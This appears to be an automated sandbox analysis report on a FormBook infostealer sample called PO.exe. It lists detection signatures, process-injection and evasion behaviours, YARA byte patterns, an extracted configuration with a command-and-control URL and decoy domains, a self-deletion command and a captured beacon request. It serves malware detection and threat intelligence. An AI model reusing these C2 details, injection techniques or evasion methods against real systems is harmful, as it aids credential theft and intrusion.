Play interactive tour

Edit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:	PO.exe
Analysis ID:	385455
MD5:	4bb710142c4fa183e24dbd3ce3c7b51d
SHA1:	64a659096deda60c37861ddc0d26d3bfb11cc0c7
SHA256:	4903d25c490e1b6c899c4fb9d3d3eb16d79c802245d4c2b667ff06f42724e358
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains very large array initializations

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

PO.exe (PID: 6856 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 4BB710142C4FA183E24DBD3CE3C7B51D)

AddInProcess32.exe (PID: 7140 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 6984 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 4488 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.retro-e-scooter.com/sawc/"], "decoy": ["prozedere.com", "p53mutation.net", "sidepiecebags.com", "5865145.com", "hushadianji.com", "riseses.com", "curvywahinemaui.com", "marienish.com", "tenxtimes.net", "xcusehheseje.com", "tjtradelimited.com", "mitraberdaya.com", "koedk.com", "currenibtc.com", "casa-rural-via.com", "prcodes.xyz", "brandariz.net", "mcsc.club", "curiget.xyz", "juli.world", "healingfory.com", "xuji68.com", "homartist.net", "acmetestanvils.com", "oaisdjoqwekxc.info", "wwwflixxy.com", "clickwisconsin.com", "magiqueweaves.com", "uox5.com", "boxj66.com", "yxcqi.com", "streaknews.com", "uorda.delivery", "milkflavor.xyz", "pandaning.com", "in-homeaccountants.com", "elblogdeyolie.com", "toughupshop.com", "sdubbink.com", "sentryinteract.com", "swpszx.com", "obsconth.site", "zhdplastic.com", "italia-re.com", "unsoldmelodies.com", "pciconsultings.com", "upliftgrp.com", "paraiso.info", "xyxrprt.com", "adanahabernet.com", "gopherguidance.com", "aengenheira.com", "myvegasboatparty.com", "abzarnovin.com", "atlantadomain.com", "sobukar.com", "directingandfilming.com", "cross23172.com", "harp-lily.com", "kentuckymeosnet.com", "wholesaletreenursery.com", "postmaster1.digital", "howtolistentomusiconline.com", "cqvckj.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f2c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30e50:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x311ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14c3f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cefd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1472b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3c9e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14d41:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3cfff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14eb9:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3d177:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9944:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x31c02:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x139a6:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3bc64:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa6bc:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3297a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19d31:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x41fef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1add4:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16c63:$sqlite3step: 68 34 1C 7B E1 0x16d76:$sqlite3step: 68 34 1C 7B E1 0x3ef21:$sqlite3step: 68 34 1C 7B E1 0x3f034:$sqlite3step: 68 34 1C 7B E1 0x16c92:$sqlite3text: 68 38 2A 90 C5 0x16db7:$sqlite3text: 68 38 2A 90 C5 0x3ef50:$sqlite3text: 68 38 2A 90 C5 0x3f075:$sqlite3text: 68 38 2A 90 C5 0x16ca5:$sqlite3blob: 68 53 D8 7F 8C 0x16dcd:$sqlite3blob: 68 53 D8 7F 8C 0x3ef63:$sqlite3blob: 68 53 D8 7F 8C 0x3f08b:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x31062:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x313fc:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59342:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x596dc:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81612:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x819ac:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3d10f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x653ef:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8d6bf:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cbfb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x64edb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8d1ab:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d211:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x654f1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8d7c1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3d389:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x65669:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8d939:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x31e14:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x5a0f4:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x823c4:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3f133:$sqlite3step: 68 34 1C 7B E1 0x3f246:$sqlite3step: 68 34 1C 7B E1 0x67413:$sqlite3step: 68 34 1C 7B E1 0x67526:$sqlite3step: 68 34 1C 7B E1 0x8f6e3:$sqlite3step: 68 34 1C 7B E1 0x8f7f6:$sqlite3step: 68 34 1C 7B E1 0x3f162:$sqlite3text: 68 38 2A 90 C5 0x3f287:$sqlite3text: 68 38 2A 90 C5 0x67442:$sqlite3text: 68 38 2A 90 C5 0x67567:$sqlite3text: 68 38 2A 90 C5 0x8f712:$sqlite3text: 68 38 2A 90 C5 0x8f837:$sqlite3text: 68 38 2A 90 C5 0x3f175:$sqlite3blob: 68 53 D8 7F 8C 0x3f29d:$sqlite3blob: 68 53 D8 7F 8C 0x67455:$sqlite3blob: 68 53 D8 7F 8C 0x6757d:$sqlite3blob: 68 53 D8 7F 8C 0x8f725:$sqlite3blob: 68 53 D8 7F 8C 0x8f84d:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7eb0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x824a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13f5d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13a49:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1405f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x141d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8c62:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12cc4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x99da:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1904f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a0f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15f81:$sqlite3step: 68 34 1C 7B E1 0x16094:$sqlite3step: 68 34 1C 7B E1 0x15fb0:$sqlite3text: 68 38 2A 90 C5 0x160d5:$sqlite3text: 68 38 2A 90 C5 0x15fc3:$sqlite3blob: 68 53 D8 7F 8C 0x160eb:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
11.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.retro-e-scooter.com/sawc/"], "decoy": ["prozedere.com", "p53mutation.net", "sidepiecebags.com", "5865145.com", "hushadianji.com", "riseses.com", "curvywahinemaui.com", "marienish.com", "tenxtimes.net", "xcusehheseje.com", "tjtradelimited.com", "mitraberdaya.com", "koedk.com", "currenibtc.com", "casa-rural-via.com", "prcodes.xyz", "brandariz.net", "mcsc.club", "curiget.xyz", "juli.world", "healingfory.com", "xuji68.com", "homartist.net", "acmetestanvils.com", "oaisdjoqwekxc.info", "wwwflixxy.com", "clickwisconsin.com", "magiqueweaves.com", "uox5.com", "boxj66.com", "yxcqi.com", "streaknews.com", "uorda.delivery", "milkflavor.xyz", "pandaning.com", "in-homeaccountants.com", "elblogdeyolie.com", "toughupshop.com", "sdubbink.com", "sentryinteract.com", "swpszx.com", "obsconth.site", "zhdplastic.com", "italia-re.com", "unsoldmelodies.com", "pciconsultings.com", "upliftgrp.com", "paraiso.info", "xyxrprt.com", "adanahabernet.com", "gopherguidance.com", "aengenheira.com", "myvegasboatparty.com", "abzarnovin.com", "atlantadomain.com", "sobukar.com", "directingandfilming.com", "cross23172.com", "harp-lily.com", "kentuckymeosnet.com", "wholesaletreenursery.com", "postmaster1.digital", "howtolistentomusiconline.com", "cqvckj.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PO.exe	Virustotal: Detection: 39%			Perma Link
Source: PO.exe	ReversingLabs: Detection: 27%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: PO.exe

Joe Sandbox ML: detected

Source: 11.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: PO.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: PO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.793729525.0000000001C2F000.00000040.00000001.sdmp, wlanext.exe, 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000002.792851636.0000000000FF2000.00000002.00020000.sdmp, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05ACC968
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then jmp 05AC8410h	0_2_05AC7B98
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05ACDA68
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_05ACD488
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05ACD488
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_05ACD47D
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05ACD47D
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_05ACD168
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05ACD168
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_05ACD15D
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05ACD15D
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then xor edx, edx	0_2_05ACD3B5
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then xor edx, edx	0_2_05ACD3C0
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05ACCC85
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop esi	11_2_00415836
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop esi	17_2_02845836

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.retro-e-scooter.com/sawc/

Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ HTTP/1.1Host: www.marienish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
